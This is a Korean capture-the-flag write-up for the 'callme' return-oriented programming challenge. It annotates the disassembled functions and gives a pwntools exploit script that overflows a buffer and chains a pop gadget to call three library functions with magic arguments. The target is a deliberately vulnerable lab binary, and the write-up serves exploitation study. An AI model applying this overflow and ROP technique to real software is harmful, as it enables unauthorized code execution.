1. intro
2. code 및 분석
2.1. code
usefulFunction
# usefulFunction: calls callme_three, callme_two, callme_one (in that order) with
# the constant arguments (4, 5, 6), then exit(1). Since each callme_* checks its
# three arguments against fixed 64-bit magic values (see callme_one below), these
# calls take the failure path; the listing mainly exposes the PLT stub addresses.
0x00000000004008f2 <+0>: push %rbp
0x00000000004008f3 <+1>: mov %rsp,%rbp
0x00000000004008f6 <+4>: mov $0x6,%edx    # arg3 = 6
0x00000000004008fb <+9>: mov $0x5,%esi    # arg2 = 5
0x0000000000400900 <+14>: mov $0x4,%edi   # arg1 = 4
0x0000000000400905 <+19>: call 0x4006f0 <callme_three@plt>
0x000000000040090a <+24>: mov $0x6,%edx
0x000000000040090f <+29>: mov $0x5,%esi
0x0000000000400914 <+34>: mov $0x4,%edi
0x0000000000400919 <+39>: call 0x400740 <callme_two@plt>
0x000000000040091e <+44>: mov $0x6,%edx
0x0000000000400923 <+49>: mov $0x5,%esi
0x0000000000400928 <+54>: mov $0x4,%edi
0x000000000040092d <+59>: call 0x400720 <callme_one@plt>
0x0000000000400932 <+64>: mov $0x1,%edi   # exit status 1
0x0000000000400937 <+69>: call 0x400750 <exit@plt>   # does not return; no epilogue follows
usefulGadget
# usefulGadget: pops the next three stack qwords into rdi, rsi, rdx — the first
# three integer argument registers of the x86-64 SysV calling convention — then
# ret transfers control to the qword that follows them on the stack.
0x000000000040093c <+0>: pop %rdi   # 1st argument
0x000000000040093d <+1>: pop %rsi   # 2nd argument
0x000000000040093e <+2>: pop %rdx   # 3rd argument
0x000000000040093f <+3>: ret
callme_one (two, three 모두 비슷함)
# callme_one(rdi, rsi, rdx): all three arguments must equal fixed 64-bit magic
# values, otherwise the function prints a message and exit(1)s. On success it
# fopen()s a file, fgets() up to 0x21 bytes into a malloc'd global g_buf, fclose()s
# and puts() a message. The low addresses (0x8xx) suggest this was disassembled
# from libcallme.so before relocation — TODO confirm.
0x000000000000081a <+0>: push %rbp
0x000000000000081b <+1>: mov %rsp,%rbp
0x000000000000081e <+4>: sub $0x30,%rsp           # 0x30-byte frame
0x0000000000000822 <+8>: mov %rdi,-0x18(%rbp)      # spill arg1
0x0000000000000826 <+12>: mov %rsi,-0x20(%rbp)     # spill arg2
0x000000000000082a <+16>: mov %rdx,-0x28(%rbp)     # spill arg3
0x000000000000082e <+20>: movabs $0xdeadbeefdeadbeef,%rax
0x0000000000000838 <+30>: cmp %rax,-0x18(%rbp)     # arg1 == 0xdeadbeefdeadbeef ?
0x000000000000083c <+34>: jne 0x912 <callme_one+248>   # mismatch -> failure path (+248)
0x0000000000000842 <+40>: movabs $0xcafebabecafebabe,%rax
0x000000000000084c <+50>: cmp %rax,-0x20(%rbp)     # arg2 == 0xcafebabecafebabe ?
0x0000000000000850 <+54>: jne 0x912 <callme_one+248>
0x0000000000000856 <+60>: movabs $0xd00df00dd00df00d,%rax
0x0000000000000860 <+70>: cmp %rax,-0x28(%rbp)     # arg3 == 0xd00df00dd00df00d ?
0x0000000000000864 <+74>: jne 0x912 <callme_one+248>
0x000000000000086a <+80>: movq $0x0,-0x8(%rbp)     # FILE *fp = NULL (slot -0x8 receives fopen's result below)
0x0000000000000872 <+88>: lea 0x32f(%rip),%rsi # 0xba8    # fopen mode string (contents not shown on this page)
0x0000000000000879 <+95>: lea 0x32a(%rip),%rdi # 0xbaa    # fopen path string (contents not shown on this page)
0x0000000000000880 <+102>: call 0x710 <fopen@plt>
0x0000000000000885 <+107>: mov %rax,-0x8(%rbp)     # fp = fopen(...)
0x0000000000000889 <+111>: cmpq $0x0,-0x8(%rbp)    # fp == NULL ?
0x000000000000088e <+116>: jne 0x8a6 <callme_one+140>   # non-NULL -> continue at +140
0x0000000000000890 <+118>: lea 0x329(%rip),%rdi # 0xbc0    # error message for fopen failure
0x0000000000000897 <+125>: call 0x6c0 <puts@plt>
0x000000000000089c <+130>: mov $0x1,%edi
0x00000000000008a1 <+135>: call 0x720 <exit@plt>   # exit(1)
0x00000000000008a6 <+140>: mov $0x21,%edi          # malloc(0x21)
0x00000000000008ab <+145>: call 0x700 <malloc@plt>
0x00000000000008b0 <+150>: mov %rax,0x2007a9(%rip) # 0x201060 <g_buf>    # g_buf = malloc result
0x00000000000008b7 <+157>: mov 0x2007a2(%rip),%rax # 0x201060 <g_buf>
0x00000000000008be <+164>: test %rax,%rax          # g_buf == NULL ?
0x00000000000008c1 <+167>: jne 0x8d9 <callme_one+191>
0x00000000000008c3 <+169>: lea 0x318(%rip),%rdi # 0xbe2    # error message for malloc failure
0x00000000000008ca <+176>: call 0x6c0 <puts@plt>
0x00000000000008cf <+181>: mov $0x1,%edi
0x00000000000008d4 <+186>: call 0x720 <exit@plt>   # exit(1)
0x00000000000008d9 <+191>: mov 0x200780(%rip),%rax # 0x201060 <g_buf>
0x00000000000008e0 <+198>: mov -0x8(%rbp),%rdx     # arg3 = fp
0x00000000000008e4 <+202>: mov $0x21,%esi          # arg2 = 0x21 (matches the malloc size)
0x00000000000008e9 <+207>: mov %rax,%rdi           # arg1 = g_buf
0x00000000000008ec <+210>: call 0x6f0 <fgets@plt>  # fgets(g_buf, 0x21, fp)
0x00000000000008f1 <+215>: mov %rax,0x200768(%rip) # 0x201060 <g_buf>    # g_buf = fgets return (NULL on EOF/error); not checked here
0x00000000000008f8 <+222>: mov -0x8(%rbp),%rax
0x00000000000008fc <+226>: mov %rax,%rdi
0x00000000000008ff <+229>: call 0x6d0 <fclose@plt> # fclose(fp)
0x0000000000000904 <+234>: lea 0x2f1(%rip),%rdi # 0xbfc    # success message (contents not shown)
0x000000000000090b <+241>: call 0x6c0 <puts@plt>
0x0000000000000910 <+246>: jmp 0x928 <callme_one+270>   # skip failure path
0x0000000000000912 <+248>: lea 0x301(%rip),%rdi # 0xc1a    # failure path: argument mismatch message
0x0000000000000919 <+255>: call 0x6c0 <puts@plt>
0x000000000000091e <+260>: mov $0x1,%edi
0x0000000000000923 <+265>: call 0x720 <exit@plt>   # exit(1)
0x0000000000000928 <+270>: nop
0x0000000000000929 <+271>: leave
0x000000000000092a <+272>: ret
2.2. 분석
main과 pwnme 함수는 역시 동일하다.
usefulGadget 및 usefulFunction이 제공되며,
usefulFunction 내에서는 callme_one, two, three를 호출한다.
3. 취약점 확인 및 공격 준비
3.1. 취약점
buffer overflow
3.2. 공격 준비
제공되는 파일은 모두 아래와 같다.
┌[wyv3rn🐲]-(~/rop)
└> ls
callme encrypted_flag.dat key1.dat key2.dat libcallme.so
위의 코드와 함께 보면 느낌이 빡 온다.
callme_one / two / three를 호출하면 flag가 decrypt 될 것이라는 느낌이.
callme_one만 보면, rdi, rsi, rdx의 값을 특정 값과 비교해서 모두 맞으면 복호화해준다.
나머지 함수도 마찬가지로 이를 맞춰 호출해주면 된다.
4. exploit
from pwn import *
# Spawn the challenge binary. libcallme.so (listed alongside the binary) must be
# loadable from the cwd or via rpath/LD_LIBRARY_PATH — not shown on this page.
p = process('./callme')
# Return targets for the three callme_* calls. Each is 6 bytes past the PLT
# addresses seen in usefulFunction's disassembly (0x400720 / 0x400740 / 0x4006f0);
# presumably the push/jmp half of the lazy-binding PLT stub — TODO confirm against .plt.
one = 0x400726
two = 0x400746
three = 0x4006f6
gadget = 0x000000000040093c #rdi rsi rdx ret  (usefulGadget: pops three qwords into the first three argument registers)
# 40 bytes of filler up to the saved return address; presumably a 32-byte buffer
# plus saved rbp in pwnme (pwnme is not shown on this page) — TODO confirm.
pay = b'A'*8*5
# Chain segment 1: gadget pops the three magic values (the constants callme_one
# compares against) into rdi, rsi, rdx, then ret lands on callme_one.
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(one)
# Chain segment 2: same argument setup, then callme_two.
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(two)
# Chain segment 3: same argument setup, then callme_three.
pay += p64(gadget)
pay += p64(0xdeadbeefdeadbeef)
pay += p64(0xcafebabecafebabe)
pay += p64(0xd00df00dd00df00d)
pay += p64(three)
# Wait for the '> ' prompt, then send the payload (sendline appends '\n').
p.sendlineafter(b'> ',pay)
# Hand the process over to the terminal to read its output.
p.interactive()